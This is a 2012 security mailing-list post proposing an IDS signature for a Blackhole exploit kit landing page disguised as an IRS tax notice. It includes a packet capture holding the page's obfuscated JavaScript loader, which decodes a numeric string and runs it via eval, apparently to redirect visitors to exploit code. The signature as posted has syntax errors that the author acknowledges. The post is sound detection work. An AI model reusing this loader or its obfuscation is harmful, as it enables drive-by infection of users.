[Emerging-Sigs] Proposed Signature - BLackhole Tax Landing

Nathan nathan at packetmail.net
Fri Feb 24 09:29:52 EST 2012


On Fri, 24 Feb 2012 08:22:22 -0600 "Nathan" <nathan at packetmail.net> wrote

> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET CURRENT_EVENTS
> Blackhole Tax Landing with JavaScript try catch";
> flow:established,from_server; content"Please wait, till tax confirmation is
> ready."; fast_pattern:only; content"try{"; content:"catch("; sid:x; rev:1;)

Must be a new mailing campaign, this one is firing pretty well.  Might be
valuable to get it out in the tarball quickly.  The above sig is missing the
colon on two of the content matches, sorry.

08:26:23.919723 IP 68.178.235.107.80 > 10.86.192.103.1466: . 1:1381(1380) ack
260 win 6432
E...e. at ./...D..k
V.g.P..[..d.1`.P.. e...HTTP/1.1 200 OK
Date: Fri, 24 Feb 2012 14:26:23 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

b7b
<html>
<title>IRS Internal Revenue Service</title>
<h1>Please wait, till tax confirmation is ready.</h1>
<h3>It will take few minutes.</h3>
<h4>Thank you</h4>
<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new
document(12);}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.sin(5*Math.PI/2);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a56.5a59.5a54a49.5a57a58.5a54.5a56a52.5a56.5a22a54a49.5a57a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a24a49a23a25.5a26.5a49a25a26.5a24a48.5a49a24a23.5a26.5a49.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a5
08:26:23.919786 IP 68.178.235.107.80 > 10.86.192.103.1466: . 1381:2761(1380)
ack 260 win 6432
E...e. at ./...D..k
V.g.P..[....1`.P..
x..7a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a56.5a59.5a54a49.5a57a58.5a54.5a56a52.5a56.5a22a54a49.5a57a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a24a49a23a25.5a26.5a49a25a26.5a24a48.5a49a24a23.5a26.5a49.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a
 57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a5
08:26:23.919792 IP 68.178.235.107.80 > 10.86.192.103.1466: FP 2761:3096(335)
ack 260 win 6432
E..we. at ./...D..k
V.g.P..[..,.1`.P..
J...7.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}q=ss;e(q);</script>
</html>

0



More information about the Emerging-sigs mailing list